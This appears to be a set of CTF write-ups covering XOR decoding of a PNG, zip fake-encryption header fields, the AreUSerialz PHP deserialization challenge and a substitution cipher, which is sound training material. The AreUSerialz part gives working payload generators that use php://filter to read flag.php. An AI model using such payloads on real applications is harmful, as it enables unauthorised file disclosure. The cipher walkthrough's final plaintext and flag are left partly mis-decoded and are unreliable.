菜狗杯 (Caigou Cup) Misc: "Do You Know XOR?" write-up

Problem analysis

The challenge mentions a mysterious number: 0x50

Downloading and extracting the file gives a PNG. Opening the image in 010 Editor shows:

Let's follow the hint from the challenge and XOR the first bytes with 0x50:

```
0xD9 ^ 0x50 = 0x89
0x00 ^ 0x50 = 0x50
0x1E ^ 0x50 = 0x4E
0x17 ^ 0x50 = 0x47
```

The detailed calculation is as follows:

Take 0xD9 ^ 0x50 = 0x89 as the example.

1. Convert the hexadecimal values to binary: 0xD9 = 11011001, 0x50 = 01010000

2. XOR each bit position: 11011001 ^ 01010000 = 10001001

3. Convert the result back to hexadecimal

The binary result 10001001 converts to hexadecimal 0x89.

Final answer

0xD9 ^ 0x50 = 0x89

The other bytes are computed the same way.

Putting these together, 89 50 4E 47 is exactly the PNG file header signature, so we write a script:

```python
with open("misc5.png", "rb") as f:
    con = f.read()  # raw bytes of the encoded image
with open("flag.png", "wb") as nfile:
    for b in con:
        # b is an int here; to turn it back into bytes use bytes() with the value in a list
        nfile.write(bytes([b ^ 0x50]))
```

This yields the flag.
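As an added example (not the write-up's script), the same decoding with the key recovered from the PNG signature instead of taken from the hint; it generalizes to any single-byte XOR key and checks all eight signature bytes before decoding. The file names and the filler bytes in the sample are constructed.

```python
# Added example, not the original write-up's script: recover a single-byte XOR
# key from the PNG signature and decode the whole file, rather than hard-coding 0x50.
PNG_SIG = bytes([0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A])

def xor_bytes(data, key):
    """XOR every byte with a one-byte key; applying it twice restores the input (A ^ k ^ k = A)."""
    return bytes(b ^ key for b in data)

def recover_key(data, magic=PNG_SIG):
    """Return the single-byte key k with data[:len(magic)] ^ k == magic, or None.
    The first byte fixes the only candidate; the remaining signature bytes confirm it."""
    if len(data) < len(magic):
        return None
    k = data[0] ^ magic[0]
    return k if xor_bytes(data[:len(magic)], k) == magic else None

def decode_file(src, dst):
    """Decode src into dst and return the key used; raises if no key fits the signature."""
    with open(src, "rb") as f:
        data = f.read()
    k = recover_key(data)
    if k is None:
        raise ValueError("no single-byte XOR key maps the header to a PNG signature")
    with open(dst, "wb") as out:
        out.write(xor_bytes(data, k))
    return k

# Constructed sample: a PNG signature plus a few filler bytes, encoded with 0x50
# exactly as in the challenge (the first bytes become D9 00 1E 17 ...).
SAMPLE_ENCODED = xor_bytes(PNG_SIG + b"\x00\x00\x00\x0dIHDR", 0x50)
```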

Properties and applications of XOR (^)


1. Basic concepts

1.1 Symbol

XOR (Exclusive OR) is a mathematical operator commonly used in logic and in bitwise operations in computing; it is written with the symbol "⊕".

1.2 Rules

The output of XOR is true (1) if and only if the two inputs differ, otherwise it is false (0): "same gives 0, different gives 1". That is:

1 ^ 1 = 0

0 ^ 0 = 0

1 ^ 0 = 1

From these rules, XOR of any binary number with zero gives the number itself: A ^ 0 = A.

1.3 Properties of XOR

XOR is commutative and associative and has an identity element, among other properties.

(1) Commutativity: A ^ B = B ^ A

(2) Associativity: ( A ^ B ) ^ C = A ^ ( B ^ C )

(3) Self-inverse: A ^ B ^ B = A (from associativity: A ^ B ^ B = A ^ ( B ^ B ) = A ^ 0 = A)

2. Applications of XOR

2.1 Swapping variables

Example: swap the values of two variables a and b; for instance a=3, b=7 becomes a=7, b=3 after the swap.

```c
int a = 3, b = 7;

// Conventional method
int temp = a; // temp = 3
a = b;        // a = 7
b = temp;     // b = 3

// XOR method (starting again from a = 3, b = 7)
a = 3; b = 7;
a = a ^ b; // a = 3 ^ 7
b = a ^ b; // b = (3 ^ 7) ^ 7 = 3 ^ (7 ^ 7) = 3
a = a ^ b; // a = (3 ^ 7) ^ 3 = (3 ^ 3) ^ 7 = 7
```

Learning zip fake encryption

Learning zip fake encryption: what the archive's hex data means

A zip file consists of three parts:

1. Compressed source file data area (local file headers and data)

2. Compressed source file directory area (the central directory)

3. End-of-central-directory marker

Take the archive from 萌新杂项6 on ctf.show as an example, opened in 010 Editor.

In the 010 Editor view:

the hex bytes with the grey background at the front are the compressed source file data area;

the purple-background hex bytes in the middle are the directory area (central directory);

the yellow-background hex bytes at the end are the end-of-central-directory marker.

This post focuses on the directory area (central directory). Its fields, in order:

50 4B 01 02: central directory file header signature

1F 00: PKWARE version used to compress (version made by)

14 00: PKWARE version needed to extract

This archive is fake-encrypted; the 09 here should be changed to 00.

00 00: general purpose bit flag (indicates whether the entry is encrypted; the key to fake encryption), 4 bytes after the directory file header signature

08 00: compression method

DC 01: last modification time

53 50: last modification date

D0 EB AE BF: CRC-32 checksum

15 00 00 00: compressed size

13 00 00 00: uncompressed size

08 00: file name length

24 00: extra field length

00 00: file comment length

00 00: disk number where the file starts

00 00: internal file attributes

20 00 00 00: external file attributes

00 00 00 00: offset of the local file header

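An added example (not from the post) that parses the central directory fields listed above with Python's struct module, reports a mismatch between the central and local general purpose bit flags (the trace that a hand-edited flag byte leaves), and clears bit 0 so the archive extracts normally. The archive it checks is constructed in memory with the zipfile module; the member name and content are made up.

```python
import io
import struct
import zipfile
# Added example, not from the original post: walk the central directory, detect a
# "fake encrypted" archive (bit 0 of the flag set although nothing was encrypted), repair it.
CD_SIG = b"PK\x01\x02"    # central directory file header (50 4B 01 02)
EOCD_SIG = b"PK\x05\x06"  # end of central directory record

def central_entries(data):
    """Yield (cd_header_offset, general_purpose_flag, local_header_offset) per entry."""
    eocd = data.rfind(EOCD_SIG)
    pos = struct.unpack_from("<I", data, eocd + 16)[0]  # EOCD +16: offset of central directory
    while data[pos:pos + 4] == CD_SIG:
        flag = struct.unpack_from("<H", data, pos + 8)[0]      # +8: general purpose bit flag
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", data, pos + 28)
        lfh_off = struct.unpack_from("<I", data, pos + 42)[0]  # +42: local header offset
        yield pos, flag, lfh_off
        pos += 46 + name_len + extra_len + comment_len

def is_fake_encrypted(data):
    """True if a central entry claims encryption but its local file header does not."""
    for _, flag, lfh_off in central_entries(data):
        local_flag = struct.unpack_from("<H", data, lfh_off + 6)[0]  # local header +6: flag
        if flag & 1 and not local_flag & 1:
            return True
    return False

def clear_encryption_flags(data):
    """Return a copy with bit 0 cleared in every central and local header flag."""
    buf = bytearray(data)
    for cd_pos, flag, lfh_off in central_entries(data):
        struct.pack_into("<H", buf, cd_pos + 8, flag & ~1)
        local_flag = struct.unpack_from("<H", buf, lfh_off + 6)[0]
        struct.pack_into("<H", buf, lfh_off + 6, local_flag & ~1)
    return bytes(buf)

def read_member(data, name):
    """Extract one member with the standard library (refuses the fake-encrypted copy)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)

def build_fake_encrypted_zip():
    """Constructed sample: a normal archive, then bit 0 set only in the central directory."""
    mem = io.BytesIO()
    with zipfile.ZipFile(mem, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("flag.txt", "flag{constructed_sample}")
    data = bytearray(mem.getvalue())
    cd_pos, flag, _ = next(central_entries(bytes(data)))
    struct.pack_into("<H", data, cd_pos + 8, flag | 1)
    return bytes(data)
```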

AreUSerialz

[网鼎杯 2020 青龙组] AreUSerialz: solution approach and process

```php
<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}
```

The is_valid() function checks the incoming string and requires every character's ASCII value to lie between 32 and 125; in other words, it returns true only if every character of the argument is printable.

```php
if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}
```

This code first obtains the string str from the GET parameter; if str contains no non-printable characters, it is passed to unserialize(). So let's look at the FileHandler class again.

```php
class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}
```

So we find that to read the flag, op must reach process() as 2 without being reset to 1 in __destruct(). The destructor uses the strict comparison `=== "2"`, while process() uses the loose `== "2"`, so passing the integer 2 fails the strict check (no reset) but still passes the loose one and reaches read(). So we construct the payload:

```php
<?php
highlight_file(__FILE__);
class FileHandler {
    protected $op = 2;
    protected $filename = "php://filter/read=convert.base64-encode/resource=d:\\phpstudy_pro\\WWW\\flag.php";
    protected $content;
}
$a = new FileHandler();
$b = serialize($a);
echo($b);
?>
```

The following payload reads the flag. Protected properties serialize with a \0*\0 prefix before the name, and those NUL bytes fail is_valid(), so the properties are declared public here:

```php
<?php
highlight_file(__FILE__);
class FileHandler {
    public $op = 2;
    public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
    public $content;
}
$a = new FileHandler();
$b = serialize($a);
echo($b);
?>
```

Deciphering

2016 National College Student Information Security Contest

I. Problem

Decipher the following ciphertext:

```
TW5650Y - 0TS UZ50S S0V LZW UZ50WKW 9505KL4G 1X WVMUSL510 S001M0UWV 910VSG S0 WFLW0K510 1X LZW54 WF5KL50Y 2S4L0W4KZ52 L1 50U14214SLW X5L0WKK S0V TSK7WLTS88 VWNW8129W0L 50 W8W9W0LS4G, 95VV8W S0V Z5YZ KUZ118K SU41KK UZ50S.LZW S001M0UW9W0L ESK 9SVW SL S K5Y050Y UW4W910G L1VSG TG 0TS UZ50S UW1 VSN5V KZ1W9S7W4 S0V FM LS1, V54WUL14 YW0W4S8 1X LZW 50LW40SL510S8 U112W4SL510 S0V WFUZS0YW VW2S4L9W0L 1X LZW 9505KL4G 1X WVMUSL510.
"EW S4W WFU5LWV L1 T41SVW0 1M4 2S4L0W4KZ52 E5LZ LZW 9505KL4G 1X WVMUSL510 L1 9S7W S 810Y-8SKL50Y 592SUL 10 LZW 85NWK 1X UZ50WKW KLMVW0LK LZ41MYZ S 6150L8G-VWK5Y0WV TSK7WLTS88 UM445UM8M9 S0V S E5VW 4S0YW 1X KUZ118 TSK7WLTS88 241Y4S9K," KS5V KZ1W9S7W4. "LZ5K U1995L9W0L 9S47K S01LZW4 958WKL10W 50 LZW 0TS'K G1MLZ S0V TSK7WLTS88 VWNW8129W0L WXX14LK 50 UZ50S." X8SY { YK182V9ZUL9STU5V}
```

II. Write-up

1. Looking closely, the code at the very end looks a lot like a flag:

```
X8SY { YK182V9ZUL9STU5V}
```

We assume X8SY corresponds to FLAG, i.e. X-F, 8-L, S-A, Y-G.

This can be summarized as a simple Caesar shift cipher: 'X' to 'F' is a shift of 18.

Substituting the letters first gives:

```
BE5650G - 0BA CH50A A0D THE CH50ESE 9505ST4O 1F EDUCAT510 A001U0CED 910DAO A0 ENTE0S510 1F THE54 EN5ST50G 2A4T0E4SH52 T1 50C14214ATE F5T0ESS A0D BAS7ETBA88 DEVE8129E0T 50 E8E9E0TA4O, 95DD8E A0D H5GH SCH118S AC41SS CH50A.THE A001U0CE9E0T MAS 9ADE AT A S5G050G CE4E910O T1DAO BO 0BA CH50A CE1 DAV5D SH1E9A7E4 A0D NU TA1, D54ECT14 GE0E4A8 1F THE 50TE40AT510A8 C112E4AT510 A0D ENCHA0GE DE2A4T9E0T 1F THE 9505ST4O 1F EDUCAT510.
"ME A4E ENC5TED T1 B41ADE0 1U4 2A4T0E4SH52 M5TH THE 9505ST4O 1F EDUCAT510 T1 9A7E A 810G-8AST50G 592ACT 10 THE 85VES 1F CH50ESE STUDE0TS TH41UGH A 6150T8O-DES5G0ED BAS7ETBA88 CU445CU8U9 A0D A M5DE 4A0GE 1F SCH118 BAS7ETBA88 241G4A9S," SA5D SH1E9A7E4. "TH5S C1995T9E0T 9A47S A01THE4 958EST10E 50 THE 0BA'S O1UTH A0D BAS7ETBA88 DEVE8129E0T EFF14TS 50 CH50A." F8AG { GS182D9HCT9ABC5D}
```

2. Try substituting the digit 8 (with L, from F8AG):

```
BE5650G - 0BA CH50A A0D THE CH50ESE 9505ST4O 1F EDUCAT510 A001U0CED 910DAO A0 ENTE0S510 1F THE54 EN5ST50G 2A4T0E4SH52 T1 50C14214ATE F5T0ESS A0D BAS7ETBALL DEVEL129E0T 50 ELE9E0TA4O, 95DDLE A0D H5GH SCH11LS AC41SS CH50A.THE A001U0CE9E0T MAS 9ADE AT A S5G050G CE4E910O T1DAO BO 0BA CH50A CE1 DAV5D SH1E9A7E4 A0D NU TA1, D54ECT14 GE0E4AL 1F THE 50TE40AT510AL C112E4AT510 A0D ENCHA0GE DE2A4T9E0T 1F THE 9505ST4O 1F EDUCAT510.
"ME A4E ENC5TED T1 B41ADE0 1U4 2A4T0E4SH52 M5TH THE 9505ST4O 1F EDUCAT510 T1 9A7E A L10G-LAST50G 592ACT 10 THE L5VES 1F CH50ESE STUDE0TS TH41UGH A 6150TLO-DES5G0ED BAS7ETBALL CU445CULU9 A0D A M5DE 4A0GE 1F SCH11L BAS7ETBALL 241G4A9S," SA5D SH1E9A7E4. "TH5S C1995T9E0T 9A47S A01THE4 95LEST10E 50 THE 0BA'S O1UTH A0D BAS7ETBALL DEVEL129E0T EFF14TS 50 CH50A." FLAG { GS1L2D9HCT9ABC5D}
```

3. Keep looking, and try substituting the digit 0

Based on A0D and STUDE0TS, guess that 0 stands for N and replace it.

```
BE565NG - NBA CH5NA AND THE CH5NESE 95N5ST4O 1F EDUCAT51N ANN1UNCED 91NDAO AN ENTENS51N 1F THE54 EN5ST5NG 2A4TNE4SH52 T1 5NC14214ATE F5TNESS AND BAS7ETBALL DEVEL129ENT 5N ELE9ENTA4O, 95DDLE AND H5GH SCH11LS AC41SS CH5NA.THE ANN1UNCE9ENT MAS 9ADE AT A S5GN5NG CE4E91NO T1DAO BO NBA CH5NA CE1 DAV5D SH1E9A7E4 AND NU TA1, D54ECT14 GENE4AL 1F THE 5NTE4NAT51NAL C112E4AT51N AND ENCHANGE DE2A4T9ENT 1F THE 95N5ST4O 1F EDUCAT51N.
"ME A4E ENC5TED T1 B41ADEN 1U4 2A4TNE4SH52 M5TH THE 95N5ST4O 1F EDUCAT51N T1 9A7E A L1NG-LAST5NG 592ACT 1N THE L5VES 1F CH5NESE STUDENTS TH41UGH A 615NTLO-DES5GNED BAS7ETBALL CU445CULU9 AND A M5DE 4ANGE 1F SCH11L BAS7ETBALL 241G4A9S," SA5D SH1E9A7E4. "TH5S C1995T9ENT 9A47S AN1THE4 95LEST1NE 5N THE NBA'S O1UTH AND BAS7ETBALL DEVEL129ENT EFF14TS 5N CH5NA." FLAG { GS1L2D9HCT9ABC5D}
```

4. Try substituting the digit 5

Based on CH5NA, CH5NESE and F5TNESS in the text, guess that 5 stands for the letter I and replace it.

```
BEI6ING - NBA CHINA AND THE CHINESE 9INIST4O 1F EDUCATI1N ANN1UNCED 91NDAO AN ENTENSI1N 1F THEI4 ENISTING 2A4TNE4SHI2 T1 INC14214ATE FITNESS AND BAS7ETBALL DEVEL129ENT IN ELE9ENTA4O, 9IDDLE AND HIGH SCH11LS AC41SS CHINA.THE ANN1UNCE9ENT MAS 9ADE AT A SIGNING CE4E91NO T1DAO BO NBA CHINA CE1 DAVID SH1E9A7E4 AND NU TA1, DI4ECT14 GENE4AL 1F THE INTE4NATI1NAL C112E4ATI1N AND ENCHANGE DE2A4T9ENT 1F THE 9INIST4O 1F EDUCATI1N.
"ME A4E ENCITED T1 B41ADEN 1U4 2A4TNE4SHI2 MITH THE 9INIST4O 1F EDUCATI1N T1 9A7E A L1NG-LASTING I92ACT 1N THE LIVES 1F CHINESE STUDENTS TH41UGH A 61INTLO-DESIGNED BAS7ETBALL CU44ICULU9 AND A MIDE 4ANGE 1F SCH11L BAS7ETBALL 241G4A9S," SAID SH1E9A7E4. "THIS C199IT9ENT 9A47S AN1THE4 9ILEST1NE IN THE NBA'S O1UTH AND BAS7ETBALL DEVEL129ENT EFF14TS IN CHINA." FLAG { GS1L2D9HCT9ABCID}
```

5. Try substituting the digit 9 with M

```
BEI6ING - NBA CHINA AND THE CHINESE MINIST4O 1F EDUCATI1N ANN1UNCED M1NDAO AN ENTENSI1N 1F THEI4 ENISTING 2A4TNE4SHI2 T1 INC14214ATE FITNESS AND BAS7ETBALL DEVEL12MENT IN ELEMENTA4O, MIDDLE AND HIGH SCH11LS AC41SS CHINA.THE ANN1UNCEMENT MAS MADE AT A SIGNING CE4EM1NO T1DAO BO NBA CHINA CE1 DAVID SH1EMA7E4 AND NU TA1, DI4ECT14 GENE4AL 1F THE INTE4NATI1NAL C112E4ATI1N AND ENCHANGE DE2A4TMENT 1F THE MINIST4O 1F EDUCATI1N.
"ME A4E ENCITED T1 B41ADEN 1U4 2A4TNE4SHI2 MITH THE MINIST4O 1F EDUCATI1N T1 MA7E A L1NG-LASTING IM2ACT 1N THE LIVES 1F CHINESE STUDENTS TH41UGH A 61INTLO-DESIGNED BAS7ETBALL CU44ICULUM AND A MIDE 4ANGE 1F SCH11L BAS7ETBALL 241G4AMS," SAID SH1EMA7E4. "THIS C1MMITMENT MA47S AN1THE4 MILEST1NE IN THE NBA'S O1UTH AND BAS7ETBALL DEVEL12MENT EFF14TS IN CHINA." FLAG { GS1L2DMHCTMABCID}
```

6. Finally, substitute the digits 1, 2 and 4 (with O, P and R) to get the answer

```
BEI6ING - NBA CHINA AND THE CHINESE MINISTRO OF EDUCATION ANNOUNCED MONDAO AN ENTENSION OF THEIR ENISTING PARTNERSHIP TO INCORPORATE FITNESS AND BAS7ETBALL DEVELOPMENT IN ELEMENTARO, MIDDLE AND HIGH SCHOOLS ACROSS CHINA.THE ANNOUNCEMENT MAS MADE AT A SIGNING CEREMONO TODAO BO NBA CHINA CEO DAVID SHOEMA7ER AND NU TAO, DIRECTOR GENERAL OF THE INTERNATIONAL COOPERATION AND ENCHANGE DEPARTMENT OF THE MINISTRO OF EDUCATION.
"ME ARE ENCITED TO BROADEN OUR PARTNERSHIP MITH THE MINISTRO OF EDUCATION TO MA7E A LONG-LASTING IMPACT ON THE LIVES OF CHINESE STUDENTS THROUGH A 6OINTLO-DESIGNED BAS7ETBALL CURRICULUM AND A MIDE RANGE OF SCHOOL BAS7ETBALL PROGRAMS," SAID SHOEMA7ER. "THIS COMMITMENT MAR7S ANOTHER MILESTONE IN THE NBA'S OOUTH AND BAS7ETBALL DEVELOPMENT EFFORTS IN CHINA." FLAG { GSOLPDMHCTMABCID}
```